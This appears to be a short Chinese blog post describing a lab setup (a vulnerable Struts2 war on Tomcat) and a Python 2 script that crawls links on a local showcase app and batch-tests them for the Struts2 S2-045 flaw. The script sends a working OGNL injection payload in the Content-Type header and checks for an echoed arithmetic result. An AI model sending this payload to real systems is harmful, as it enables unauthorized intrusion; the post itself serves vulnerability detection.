0x00 环境
存在struts2-045漏洞的war包
apache-tomcat
0x01 脚本
#coding:utf-8 import re import urllib import urllib2 import linecache url="http://127.0.0.1:8080/struts2-rest-showcase/orders.xhtml" resp=urllib.urlopen(url).read() data=re.compile(r‘href=.+\"\s‘).findall(resp) #读取网页中链接 for i in data: link=‘http://127.0.0.1:8080/struts2-rest-showcase/‘+i.split(‘\"‘)[1] # with open(‘url.txt‘,‘a‘) as fw: # fw.write(link+‘\n‘) payload="%{(#test=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}" ua_headers={"user-agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36","Content-Type":payload} try: req=urllib2.Request(link,headers=ua_headers) response=urllib2.urlopen(req).read() if ‘105059592‘ in response: print ‘存在struts2-045漏洞‘+‘:‘+‘\t‘+link except Exception,e: print e
我这里简单抓了一下网站的链接,然后批量检测,结果如下图:
